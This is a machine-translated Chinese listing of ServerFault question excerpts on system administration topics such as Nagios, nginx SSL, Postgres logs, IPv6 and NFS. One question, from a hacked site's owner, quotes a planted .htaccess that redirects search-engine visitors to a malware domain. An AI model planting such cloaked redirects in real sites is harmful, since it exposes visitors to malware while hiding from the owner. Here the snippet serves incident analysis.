服务器管理员

系统和网络管理员的问答

1
Nagios根据服务状态检查服务频率
我正在尝试通过监视si来检测磁盘抖动,因此请使用vmstat命令。我正在使用nagios监视其他服务,并且每5分钟会进行一次服务检查。对于此中断服务,我希望nagios每20分钟检查一次,如果返回的状态不正确(即警告或严重),则应每3分钟检查一次中断服务,直到服务返回的状态变为OK。所有其他服务的服务检查时间保持不变。 我是Nagios的新手,对此提供的任何帮助将不胜感激。
9 nagios 

2
Postgres内部日志轮换机制可以删除早于特定时间的日志文件吗?
我正在使用posgtres的内部日志旋转机制。我希望删除30天以上的日志文件。我如何获得postgres来做到这一点?如果postgres不支持它,是否可以将logrotate设置为仅删除30天以上的日志? 我当前的配置是: log_destination = 'stderr' logging_collector = on log_directory = 'pg_log' log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' #log_truncate_on_rotation = off log_rotation_age = 1440 log_rotation_size = 0

5
如何在一台虚拟服务器上使用ssl_verify_client = ON并在另一台虚拟服务器上使用ssl_verify_client = OFF?
我想强制对我的虚拟主机进行ssl客户端验证。但是出现“未发送必需的SSL证书”错误,试图从中获取某些信息。 这是我的测试配置: # defaults ssl_certificate /etc/certs/server.cer; ssl_certificate_key /etc/certs/privkey-server.pem; ssl_client_certificate /etc/certs/allcas.pem; server { listen 1443 ssl; server_name server1.example.com; root /tmp/root/server1; ssl_verify_client off; } server { listen 1443 ssl; server_name server2.example.com; root /tmp/root/server2; ssl_verify_client on; } 第一台服务器回复200个http代码,但第二台服务器返回“ 400 Bad Request,未发送所需的SSL证书,nginx / 1.0.4”。 可能在同一IP上使用ssl_verify_client是不可能的吗?我应该将这些服务器绑定到不同的IP,这可以解决我的问题吗?
9 nginx  ssl  web 

6
找不到apache服务器状态。检查是否启用了mod_status
我已经apache_在munin节点上启用了插件: ln -sv /usr/share/munin/plugins/apache_* /etc/munin/plugins/ 重新启动节点后,service munin-node restart这里是我得到的错误: $ munin-node-configure --suggest 2>/dev/null | grep "apache\|Plugin\|------" Plugin | Used | Suggestions ------ | ---- | ----------- apache_accesses | yes | no [apache server-status not found. check if mod_status is enabled] apache_processes | yes | no [apache server-status not found. check if …



2
ipv6:`ifconfig`显示“ Scope:Link”。什么是“范围:链接”?
我在RedHat 6盒子上。默认情况下启用IPv6,并且已为所有接口分配了IPv6地址。 ifconfig 报告这些IPv6地址具有“链接”的范围。 %ifconfig eth0链接encap:以太网HWaddr 00:24:90:AA:BB:1A inet地址:192.168.10.100 Bcast:192.168.10.255掩码:255.255.255.0 inet6地址:fe80 :: 224:90ff:feaa:bb1a / 64范围:Link UP广播运行多播MTU:1500公制:1 eth1链接encap:以太网HWaddr 00:24:90:AA:BB:1B inet地址:10.8.8.44 Bcast:10.8.8.255掩码:255.255.255.0 inet6地址:fe80 :: 224:90ff:feaa:bb1b / 64范围:链接向上广播运行多播MTU:1500公制:1 “范围:链接”是什么意思?我看到IPv6地址的后半部分类似于NIC的MAC地址。即使我没有明确设置IPv6地址,同一网段上的其他设备是否也可以ping通该设备? 为什么我的IPv4地址没有显示此范围?“ Scope:Link”是仅IPv6的概念吗?
9 linux  ipv6 

2
完全无声的自动复制
我正在尝试无声地自动复制某些文件。现在,我已经进行了robocopy的操作,将所有内容都放入了一个日志文件中,这很好,但是Log File: C:\<logfiledestination>打印完成之后。我的命令如下所示: robocopy source destination /mir /xd .svn /log:log.txt /np >nul 2>&1。 通过在线搜索,我认为这样>nul 2>&1可以阻止任何事情出现。我对Windows命令行非常陌生,因此,如果我做错了什么,请告诉我! 编辑:我在那里错过了一个幻影半句子。现在修复。

2
通过受感染的FTP帐户剖析网站攻击
我的网站已被黑客入侵,目前,我知道一些细节,但对于确切的发生方式或将来如何阻止它,我一无所知。我需要您的帮助来剖析攻击,以防止再次发生。这有点长,但是我想确保提供足够的信息来帮助解决问题。 这是发生了什么事。 几周前,我收到托管公司GoDaddy的电子邮件,说我的网站使用了太多资源,他们期望MySQL查询是罪魁祸首。有问题的查询是其中包含5-6个字词的搜索查询。我设置的方式越多,搜索的词越多,查询变得越复杂。没问题。我已修复它,但与此同时,GoDaddy也暂时关闭了我的帐户,大约3天后一切恢复正常。 发生此事件后,我的搜索引擎流量急剧下降了大约90%。我很没想到,它很烂,将其写到惨败的查询中,并确定它会在Google重新抓取该网站后及时返回。没有。 几天前,我收到用户的电子邮件,说我的网站托管了恶意软件。我直接在浏览器中加载了该网站,但没有看到任何内容注入该页面。然后,我检查了.htaccess文件,发现了以下内容: <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 …

3
Tomcat AJP-Connectors如何工作?
我想使用连接器通过Apache网络服务器访问Tomcat。我坚持使用文档:http : //tomcat.apache.org/connectors-doc/generic_howto/quick.html 我只对其进行了少许修改,以匹配Debian-(Squeeze)-System上使用的目录结构。 因此,我将以下内容添加到/etc/apache2/httpd.conf中: # Load mod_jk module # Update this path to match your modules location #LoadModule jk_module libexec/mod_jk.so # Declare the module for <IfModule directive> (remove this line on Apache 2.x) #AddModule mod_jk.c # Where to find workers.properties # Update this path to match your conf directory …

2
典型的NFS读/写速率是多少
我刚刚安装了通过NFS将HTTP视频流文件发送到Web服务器的服务器,并且我想确保传输速度得到了优化。但是我不知道典型的读写速率是什么,所以我不知道我是否已经接近最大速率。据我所知,wsize和rsize参数是重要的,但我不知道他们在默认为,如果它的价值改变它们。 根据NFS上的sourceforge文章,我使用以下命令测试了写入速度: time dd if=/dev/zero of=/mnt/data/video/testfile bs=16k count=16384 而且我得到了48MB / s的写入速率。 我对此进行了多次测试(卸载/安装以清除缓存),并且速度相当稳定。 我测试了读取速度: time dd if=/mnt/data/video/testfile of=/dev/null bs=16k 并获得117MB / s的读取速率 以太网交换机和所有电缆都适用于1Gb / s,并且两台计算机上的NIC都设置为使用巨型帧(MTU = 9000),并且在/ etc / exportfs中设置了该async选项-速度对我而言比完美的数据更重要诚信。这两台机器都是带有7.2K SATA驱动器(一个为3G,另一个为6G)的HP Proliant的标准配置。两台机器都使用Linux 2.6.18。发送文件的计算机正在运行CentOS 5.5,接收文件的计算机正在运行RHEL 5.4(Tikanga)。 我希望已经测试了许多不同系统的人可以说出上述数字对于NFS数据传输是否典型,或者是否有足够的空间来增加它们。

4
如何确定光盘旋转时间
我可以使用以下命令设置APM和降速时间: hdparm -S 246 -B 128 /dev/sda 不幸的是,我只能在信息输出中找到APM值: hdparm -I /dev/sda | grep Advanced 如何查看降速时间值?我怀疑我的光盘忽略了我的价值。我希望看到它。尝试过smartctl但没有运气,请帮忙。 更新:事实证明,调优非常激进。当我将其调低时,我的光盘不会旋转。它在那里设置了一些东西。

3
如何从CUPS中删除打印机?
我的本地CUPS服务器对我使用的打印机名称感到困惑。它有两个名称:hpext和hpext@vm-cups。我永远无法预测哪个会工作,如果我使用了错误的工作,工作就会无限期地排在队列中。 没有列出打印机/etc/cupsd/cupsd.conf;相反,我有线 BrowsePoll cups.eecs.tufts.edu 该服务器仅列出hpext而未列出hpext@vm-cups。 我在想我的本地服务器有些混乱,如果可以从打印机内存中删除打印机,一切都会好起来的。但是我在文档中找不到任何删除打印机的命令,并且愚蠢的Web界面上的DELETE PRINTER按钮无效。 我能做什么?
9 linux  printing  cups 

4
在不重新引导服务器的情况下卸载根文件系统
我有一台可以通过SSH访问的服务器。没有可用的KVM,整个服务器只有一个根分区。我已经删除了一些我本不需要的文件,并希望使用extundelete(http://extundelete.sourceforge.net/)恢复它们。为此,我需要卸载目标文件系统。 有没有一种方法可以在不重新引导的情况下卸载根文件系统?也许通过执行与initrd相似的操作来引导系统,然后再在某些系统上安装根文件系统? 谢谢
9 linux  chroot 

4
netcat吞吐量低而iperf高
我正在测试连接在同一路由器上的两台计算机之间的吞吐量,其中一台具有100mbps局域网,另一台具有54mbps wifi。 这是有趣的部分: 使用nc,从A传送到B时,我得到2.63MB / s(用来衡量pv -r|nc ipB) 使用iperf,我得到23MB / s,这几乎可以。 可能是什么问题nc? 两者的操作系统均为ubuntu 11.04。
9 bandwidth 

By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.